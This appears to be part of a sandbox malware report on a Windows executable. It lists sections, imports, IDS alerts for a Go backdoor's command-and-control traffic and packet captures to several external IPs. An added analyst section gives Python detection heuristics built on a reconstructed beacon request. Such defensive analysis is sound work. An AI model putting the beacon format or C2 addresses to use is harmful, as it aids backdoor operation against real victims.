                              call 00007F3D448D5A7Dh
                              add esp, 20h
                              mov dword ptr [ebp-08h], eax
                              pop edi
                              pop esi
                              pop ebx
                              mov eax, dword ptr [ebp+00h]
                              Programming Language:
                              • [C++] VS2008 build 21022
                              • [C++] VS2005 build 50727
                              • [ C ] VS2005 build 50727
                              • [IMP] VS2005 build 50727
                              • [ASM] VS2008 SP1 build 30729
                              • [ C ] VS2008 SP1 build 30729
                              • [C++] VS2008 SP1 build 30729
                              • [RES] VS2008 build 21022
                              • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd771c | 0x190 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe9000 | 0x790d5c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x123898 | 0x37a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11b000 | 0x9dd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb8c10 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc6720 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb8000 | 0x8ac | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb7000 | 0xb6c00 | 209499c11726f362ccd66f1fbadf0dd2 | False | 0.5103921746751026 | data | 6.788533709823602 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb8000 | 0x23000 | 0x22800 | eb91e1596f235b3413d6fa622b45c87a | False | 0.32765794836956524 | data | 4.672379036995675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xdb000 | 0xe000 | 0x6000 | d2bdce02712eb535a94a1cb6ac8c2cc2 | False | 0.2332763671875 | OpenPGP Public Key | 4.3556072570206315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xe9000 | 0x790d5c | 0x790e00 | 067ffc953e40fa64a98d03031022ba0a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               UIDATA | 0xe93c4 | 0x29e4a | Zip archive data, at least v1.0 to extract, compression method=store | English | United States | 0.14798885741925707
                               UIDATA | 0x113210 | 0x1774 | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | English | United States | 0.14723517654896737
                               UIDATA | 0x114984 | 0x10be | Unicode text, UTF-16, little-endian text, with CRLF line terminators | English | United States | 0.1532897806812879
                               RT_ICON | 0x115a44 | 0xaae0 | PC bitmap, Windows 3.x format, 6329 x 2 x 41, image size 44655, cbSize 43744, bits offset 54 | | | 0.5107671909290417
                               RT_ICON | 0x120524 | 0x86ee | PC bitmap, Windows 3.x format, 4542 x 2 x 53, image size 34904, cbSize 34542, bits offset 54 | | | 0.422992299229923
                               RT_ICON | 0x128c14 | 0x3e9b | PC bitmap, Windows 3.x format, 2443 x 2 x 46, image size 16391, cbSize 16027, bits offset 54 | | | 0.4940413052973108
                               RT_ICON | 0x12cab0 | 0x1817d | PC bitmap, Windows 3.x format, 12386 x 2 x 41, image size 98844, cbSize 98685, bits offset 54 | | | 0.4911992704058368
                               RT_ICON | 0x144c30 | 0x730236 | PC bitmap, Windows 3.x format, 942397 x 2 x 51, image size 7537883, cbSize 7537206, bits offset 54 | | | 0.6396074295043945
                               RT_ICON | 0x874e68 | 0xffb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8944023466145197
                               RT_ICON | 0x875e64 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.04948132780082987
                               RT_ICON | 0x87840c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.0825515947467167
                               RT_ICON | 0x8794b4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.19858156028368795
                               RT_RCDATA | 0x87991c | 0x80 | data | English | United States | 1.0859375
                               RT_GROUP_ICON | 0x87999c | 0x3e | data | English | United States | 0.8064516129032258
                               RT_VERSION | 0x8799dc | 0x380 | data | English | United States | 0.43191964285714285
                               DLL | Imports
                               KERNEL32.dll | ExitThread, CreateThread, ExitProcess, GetStartupInfoW, RtlUnwind, HeapReAlloc, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, GetStdHandle, GetModuleFileNameA, GetTimeFormatA, GetDateFormatA, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, GetConsoleCP, GetConsoleMode, LCMapStringA, SetHandleCount, GetFileType, GetStartupInfoA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetStringTypeA, GetStringTypeW, IsDebuggerPresent, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, GetProcessHeap, CreateFileA, SetEnvironmentVariableA, SetUnhandledExceptionFilter, HeapAlloc, TerminateProcess, GetFileSizeEx, LocalFileTimeToFileTime, GetLocaleInfoW, CompareStringA, GetShortPathNameW, SetEndOfFile, FlushFileBuffers, GlobalFlags, GlobalAddAtomW, GlobalFindAtomW, lstrcmpiA, GetTempFileNameW, OpenMutexW, ReleaseMutex, HeapWalk, HeapLock, OpenThread, HeapUnlock, OutputDebugStringW, SetFilePointerEx, IsProcessorFeaturePresent, GlobalDeleteAtom, LoadLibraryA, GetVersionExA, UnhandledExceptionFilter, HeapFree, lstrlenA, lstrcmpA, CompareStringW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetFullPathNameW, GetLogicalDriveStringsW, DeviceIoControl, InterlockedExchange, MoveFileW, GetFileAttributesW, RemoveDirectoryW, FindClose, FindNextFileW, FindFirstFileW, QueryPerformanceCounter, SetFileAttributesW, lstrcmpW, GlobalAlloc, GlobalLock, GlobalUnlock, SetErrorMode, SetEnvironmentVariableW, GetCommandLineW, ExpandEnvironmentStringsW, lstrcmpiW, lstrlenW, SetFilePointer, InterlockedIncrement, ProcessIdToSessionId, FreeResource, GetSystemWindowsDirectoryW, LocalAlloc, SystemTimeToFileTime, GetModuleHandleA, GetTimeZoneInformation, LocalFree, GlobalFree, CreateMutexW, FreeConsole, GetCurrentProcessId, LoadLibraryExW, GetTempPathW, GetDriveTypeW, GetWindowsDirectoryW, GetUserDefaultUILanguage, SetCurrentDirectoryW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, Sleep, InterlockedCompareExchange, GetVersionExW, GetModuleFileNameW, MultiByteToWideChar, WriteFile, ReadFile, GetFileSize, CreateFileW, CopyFileW, FreeLibrary, LoadLibraryW, GetModuleHandleW, GetProcAddress, InterlockedDecrement, MulDiv, GetCurrentProcess, SetEvent, CreateEventW, ResetEvent, GetTickCount, WaitForSingleObject, WideCharToMultiByte, GetSystemTimeAsFileTime, DeleteFileW, GetVersion, GetSystemDirectoryW, SetLastError, RaiseException, DeleteCriticalSection, InitializeCriticalSection, CreateProcessW, GetLastError, OpenProcess, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, CloseHandle, LeaveCriticalSection, EnterCriticalSection, GetCurrentThreadId, FlushInstructionCache, GetUserDefaultLCID
                               USER32.dll | GetWindowTextW, GetWindowTextLengthW, RedrawWindow, DrawTextW, DispatchMessageW, TranslateMessage, GetMessageW, SetWindowTextW, GetWindow, MonitorFromWindow, MapWindowPoints, IsRectEmpty, IsDialogMessageW, GetClientRect, DrawIconEx, DestroyIcon, GetActiveWindow, MessageBoxW, InvalidateRect, MonitorFromRect, PostQuitMessage, UnhookWindowsHookEx, GetLastActivePopup, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, ValidateRect, CallNextHookEx, SetWindowsHookExW, GetSysColorBrush, CheckMenuItem, EnableMenuItem, ModifyMenuW, SetCursor, GetDlgCtrlID, GetKeyState, GetWindowDC, BeginPaint, LoadBitmapW, SetWindowLongW, GetWindowLongW, DefWindowProcW, CallWindowProcW, GetWindowThreadProcessId, FindWindowW, SendMessageTimeoutW, IsWindow, KillTimer, GetMenuCheckMarkDimensions, DestroyWindow, GetWindowPlacement, ShowWindow, SetTimer, IsWindowVisible, RegisterClassExW, GetClassInfoExW, SetMenu, GetMessageTime, GetTopWindow, RemovePropW, GetPropW, SetPropW, GetCapture, WinHelpW, DestroyMenu, TabbedTextOutW, DrawTextExW, GrayStringW, EndPaint, SetCapture, ReleaseCapture, GetClassLongW, SetClassLongW, BringWindowToTop, SwitchToThisWindow, GetSystemMetrics, CharNextW, PeekMessageW, DestroyAcceleratorTable, InvalidateRgn, FillRect, CreateAcceleratorTableW, GetSysColor, GetClassNameW, GetDlgItem, IsChild, LoadImageW, LoadIconW, GetDesktopWindow, LoadCursorW, CreateWindowExW, EnableWindow, GetParent, SendMessageW, SetWindowPos, LoadStringW, UnregisterClassA, SetFocus, IsWindowEnabled, SetRectEmpty, RegisterWindowMessageW, GetDC, ReleaseDC, GetFocus, CopyRect, OffsetRect, ClientToScreen, GetMessagePos, PtInRect, ScreenToClient, MoveWindow, GetWindowRect, GetMonitorInfoW, AllowSetForegroundWindow, GetForegroundWindow, AttachThreadInput, SetForegroundWindow, SetActiveWindow, SetMenuItemBitmaps, IsIconic, SystemParametersInfoA, GetMenu, AdjustWindowRectEx, RegisterClassW, PostMessageW, GetKeyboardState, keybd_event, GetClassInfoW
                               GDI32.dll | ScaleWindowExtEx, PtVisible, SetWindowExtEx, SetMapMode, RestoreDC, SaveDC, ExtTextOutW, GetClipBox, CreateBitmap, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, Escape, TextOutW, RectVisible, GetStockObject, BitBlt, SetViewportOrgEx, GetPixel, CreateCompatibleBitmap, CreateFontW, SetTextColor, SetBkColor, CreateSolidBrush, GetTextExtentPoint32W, GetTextMetricsW, GetObjectA, GetObjectW, SelectObject, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps
                               WINSPOOL.DRV | ClosePrinter, DocumentPropertiesW, OpenPrinterW
                               ADVAPI32.dll | RegOpenKeyExA, ConvertSidToStringSidW, RegQueryValueExA, RegDeleteValueW, RegEnumKeyExW, RegQueryInfoKeyW, RegDeleteKeyW, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, RegCreateKeyExW, RegSetValueExW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegEnumKeyExA
                               SHELL32.dll | SHOpenFolderAndSelectItems, SHGetMalloc, SHGetSpecialFolderLocation, DragAcceptFiles, DragFinish, DragQueryFileW, SHGetFileInfoW, ShellExecuteExW, ShellExecuteW, SHGetPathFromIDListW, SHGetSpecialFolderPathW, SHGetFolderPathW
                               ole32.dll | OleLockRunning, StringFromGUID2, OleUninitialize, OleInitialize, CoCreateInstance, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoUninitialize, CoGetClassObject, CLSIDFromProgID, CLSIDFromString, CreateStreamOnHGlobal
                               OLEAUT32.dll | VariantChangeType, LoadTypeLib, LoadRegTypeLib, SysStringLen, OleCreateFontIndirect, VarUI4FromStr, SysAllocStringLen, VarBstrCmp, SafeArrayUnlock, SafeArrayLock, SafeArrayDestroy, SafeArrayCreate, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, SafeArrayCopy, SafeArrayGetVartype, DispCallFunc, VariantInit, VariantClear, SysAllocString, SysFreeString
                               SHLWAPI.dll | StrCmpIW, PathCompactPathW, PathStripPathW, PathFindFileNameW, PathIsDirectoryW, PathAddBackslashW, StrStrIW, PathRemoveFileSpecW, PathAppendW, PathCombineW, SHSetValueA, SHGetValueA, PathFileExistsW, ColorHLSToRGB, ColorRGBToHLS, SHGetValueW, wnsprintfW
                               COMCTL32.dll | InitCommonControlsEx
                               gdiplus.dll | GdipDeletePrivateFontCollection, GdipNewPrivateFontCollection, GdipDrawImageRectRectI, GdipDrawLine, GdipAddPathEllipseI, GdipGetPathGradientPointCount, GdipSetPathGradientSurroundColorsWithCount, GdipSetPathGradientCenterColor, GdipCreatePathGradientFromPath, GdipCreateFromHWND, GdipGetFontHeight, GdipCreatePen2, GdipDrawRectangleI, GdipCreateLineBrushFromRect, GdipAddPathRectangleI, GdipPrivateAddMemoryFont, GdipSetPenWidth, GdipDrawEllipseI, GdipSetPenDashOffset, GdipAddPathLineI, GdipSetPixelOffsetMode, GdipDrawImageRectI, GdipGetImageGraphicsContext, GdipGetImagePixelFormat, GdipDrawImagePointRectI, GdipResetWorldTransform, GdipCreateBitmapFromScan0, GdipDrawPath, GdipFillPath, GdipSetSmoothingMode, GdipGetSmoothingMode, GdipResetClip, GdipCreatePath, GdipFillRectangleI, GdipRotateWorldTransform, GdipGetPixelOffsetMode, GdipTranslateWorldTransform, GdipSetClipRectI, GdipSetTextRenderingHint, GdipCreateFont, GdipGetFontCollectionFamilyList, GdipCreateLineBrushFromRectI, GdipClosePathFigure, GdipAddPathArcI, GdipResetPath, GdipDrawString, GdipMeasureString, GdipSetStringFormatAlign, GdipSetStringFormatLineAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipDeleteFont, GdipCreateFontFromLogfontA, GdipCreateFontFromDC, GdipDrawRectangle, GdipDrawLineI, GdipSetPenDashStyle, GdipDeletePen, GdipCreatePen1, GdipBitmapSetPixel, GdipBitmapGetPixel, GdipGetImageHeight, GdipGetImageWidth, GdipCreateBitmapFromFile, GdipCloneImage, GdipDisposeImage, GdipFillRectangle, GdipCloneBrush, GdipAlloc, GdipFree, GdipDeleteBrush, GdipCreateSolidFill, GdipDeleteGraphics, GdipCreateFromHDC, GdipCreateBitmapFromStream, GdipSetPathGradientGammaCorrection, GdipSetPathGradientCenterPoint, GdipAddPathLine2, GdipGetPathWorldBoundsI, GdipAddPathPie, GdipAddPathLine, GdipAddPathArc, GdipSaveImageToFile, GdipGetImageEncoders, GdipGetImageEncodersSize, GdipSetInterpolationMode, GdipCloneFontFamily, GdipDeleteFontFamily, GdipDeletePath, GdipSetLinePresetBlend
                               VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                               WININET.dll | InternetCloseHandle, HttpQueryInfoW, InternetSetOptionW, InternetReadFile, InternetOpenUrlW, DeleteUrlCacheEntryW, InternetOpenW
                               PSAPI.DLL | GetModuleFileNameExW
                               IMM32.dll | ImmDisableIME
                               RPCRT4.dll | NdrAsyncClientCall, RpcAsyncInitializeHandle, RpcStringBindingComposeW, RpcBindingFromStringBindingW, RpcAsyncCompleteCall, RpcStringFreeW, RpcBindingFree
                               OLEACC.dll | LresultFromObject, CreateStdAccessibleObject
                               WTSAPI32.dll | WTSQuerySessionInformationW
                               USERENV.dll | GetUserProfileDirectoryW
                               Language of compilation system | Country where language is spoken
                               English | United States
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2024-11-10T16:48:27.568206+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.7 | 49740 | TCP
                               2024-11-10T16:48:51.808061+0100 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 185.157.213.253 | 12072 | 192.168.2.7 | 49893 | TCP
                               2024-11-10T16:48:51.808327+0100 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.7 | 49893 | 185.157.213.253 | 12072 | TCP
                               2024-11-10T16:49:06.205644+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.7 | 49966 | TCP
                               2024-11-10T16:49:21.106238+0100 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.7 | 49893 | 185.157.213.253 | 12072 | TCP
                               2024-11-10T16:49:21.344322+0100 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 185.157.213.253 | 12072 | 192.168.2.7 | 49893 | TCP
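The ETPRO signatures above fire only on the port-12072 exchange with 185.157.213.253; none of the listed alerts covers the HTTP POSTs to port 80 shown in the sessions further down, and the two CVE-2016-2211 alerts sit on an inbound port-443 flow (local ports 49740 and 49966) that does not appear in the packet list, so they are not attributable to the sample from this report alone. What follows is an added example, not part of the Joe Sandbox report, of a header-level heuristic for those POSTs: five properties of the request head, each weak on its own, are scored together. The beacon request is reconstructed from the Session 0 head; the benign request, the indicator names and the threshold of four indicators are my own choices.

```python
"""Header heuristics for the Go beacon POSTs captured in this report.

Added example; not part of the Joe Sandbox report. The beacon request is
constructed from the Session 0 request head; the benign request is made up.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

# Constructed from Session 0 of the report (body omitted; only the head is scored).
BEACON_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Host: 46.8.232.106\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "Content-Length: 198\r\n"
    "X-Api-Key: imeRTf84\r\n"
    "Accept-Encoding: gzip\r\n"
)

# Made-up benign traffic: a Go program talking to a named API with a proper Content-Type.
BENIGN_GO_REQUEST = (
    "POST /v1/metrics HTTP/1.1\r\n"
    "Host: telemetry.example.com\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 57\r\n"
    "Accept-Encoding: gzip\r\n"
)

API_KEY_RE = re.compile(r"^[A-Za-z0-9]{8}$")


def parse_head(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP/1.x request head into (method, target, headers); header names lower-cased."""
    lines = raw.strip().split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def host_is_literal_ip(host: str) -> bool:
    """True when the Host header is an IP literal (optionally with :port) rather than a DNS name."""
    candidate = host
    if host.startswith("["):               # [v6] or [v6]:port
        candidate = host[1:host.find("]")]
    elif host.count(":") == 1:             # v4:port
        candidate = host.split(":")[0]
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def beacon_indicators(raw: str) -> List[str]:
    """Return the name of every indicator the request head matches (empty list: nothing matched)."""
    method, target, h = parse_head(raw)
    hits = []
    if method == "POST" and target == "/":
        hits.append("POST to the bare path /")
    if h.get("user-agent", "").startswith("Go-http-client/"):
        hits.append("default Go net/http User-Agent")
    if host_is_literal_ip(h.get("host", "")):
        hits.append("Host is an IP literal, not a name")
    if API_KEY_RE.match(h.get("x-api-key", "")):
        hits.append("8-character alphanumeric X-Api-Key")
    if "content-type" not in h and h.get("content-length", "0") != "0":
        hits.append("request body without Content-Type")
    return hits


def is_beacon(raw: str, threshold: int = 4) -> bool:
    """Score-based verdict: four of the five indicators together are specific enough to act on."""
    return len(beacon_indicators(raw)) >= threshold


if __name__ == "__main__":
    for label, req in (("session 0", BEACON_REQUEST), ("benign", BENIGN_GO_REQUEST)):
        verdict = "BEACON" if is_beacon(req) else "ok"
        print(f"{label}: {verdict} {beacon_indicators(req)}")
```

The threshold is deliberately above the User-Agent alone, since every Go program that does not set its own User-Agent sends `Go-http-client/1.1`. The 429 replies in the sessions are worth a second look as well: `text/plain; charset=utf-8`, `X-Content-Type-Options: nosniff`, a newline-terminated 18-byte body and no Server header is exactly the output of Go's `net/http` `http.Error` helper, so the servers that rate-limited the sample appear to be Go services themselves.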
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Nov 10, 2024 16:48:10.065001965 CET | 49699 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:10.069967985 CET | 80 | 49699 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:10.070074081 CET | 49699 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:10.071127892 CET | 49699 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:10.077454090 CET | 80 | 49699 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:10.942055941 CET | 80 | 49699 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:10.991493940 CET | 49699 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:11.011552095 CET | 49700 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:11.016408920 CET | 80 | 49700 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:11.016529083 CET | 49700 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:11.032814980 CET | 49700 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:11.038469076 CET | 80 | 49700 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:11.878170967 CET | 80 | 49700 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:11.899976969 CET | 49701 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:11.904937029 CET | 80 | 49701 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:11.905029058 CET | 49701 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:11.905344009 CET | 49701 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:11.910208941 CET | 80 | 49701 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:11.921319962 CET | 49700 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:12.779258966 CET | 80 | 49701 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:12.802493095 CET | 49702 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:12.807491064 CET | 80 | 49702 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:12.807600975 CET | 49702 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:12.807813883 CET | 49702 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:12.813083887 CET | 80 | 49702 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:12.823893070 CET | 49701 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:13.719944000 CET | 80 | 49702 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:13.761356115 CET | 49702 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:13.942419052 CET | 49703 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:13.947570086 CET | 80 | 49703 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:48:13.947645903 CET | 49703 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:13.962546110 CET | 49703 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:13.968713999 CET | 80 | 49703 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:48:15.247839928 CET | 80 | 49703 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:48:15.248121023 CET | 49703 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:15.248181105 CET | 49701 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:15.248193979 CET | 49702 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:15.248251915 CET | 49699 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:15.248276949 CET | 49700 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:15.253757000 CET | 80 | 49703 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:48:15.254115105 CET | 49703 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:15.254277945 CET | 80 | 49701 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:15.254288912 CET | 80 | 49702 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:15.254298925 CET | 80 | 49699 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:15.254411936 CET | 49701 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:15.254414082 CET | 49702 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:15.254456997 CET | 49699 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:15.256875992 CET | 80 | 49700 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:15.256957054 CET | 49700 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:45.272735119 CET | 49854 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:45.277693987 CET | 80 | 49854 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:45.277818918 CET | 49854 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:45.278079987 CET | 49854 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:45.282883883 CET | 80 | 49854 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:46.231353045 CET | 80 | 49854 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:46.255223989 CET | 49860 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:46.260148048 CET | 80 | 49860 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:46.260250092 CET | 49860 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:46.260587931 CET | 49860 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:46.265599012 CET | 80 | 49860 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:46.276494980 CET | 49854 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:47.175920963 CET | 80 | 49860 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:47.198432922 CET | 49866 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:47.203372002 CET | 80 | 49866 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:47.203485012 CET | 49866 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:47.203821898 CET | 49866 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:47.208656073 CET | 80 | 49866 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:47.219984055 CET | 49860 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:48.065321922 CET | 80 | 49866 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:48.087518930 CET | 49872 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:48.092461109 CET | 80 | 49872 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:48.092581987 CET | 49872 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:48.092874050 CET | 49872 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:48.097819090 CET | 80 | 49872 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:48.108997107 CET | 49866 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:48.975406885 CET | 80 | 49872 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:49.009618998 CET | 49878 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:49.014575958 CET | 80 | 49878 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:48:49.014672041 CET | 49878 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:49.016057968 CET | 49878 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:49.020998955 CET | 80 | 49878 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:48:49.032305956 CET | 49872 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:51.090313911 CET | 80 | 49878 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:48:51.094146967 CET | 49872 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:51.094182968 CET | 49866 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:51.094188929 CET | 49860 | 80 | 192.168.2.7 | 46.8.236.61
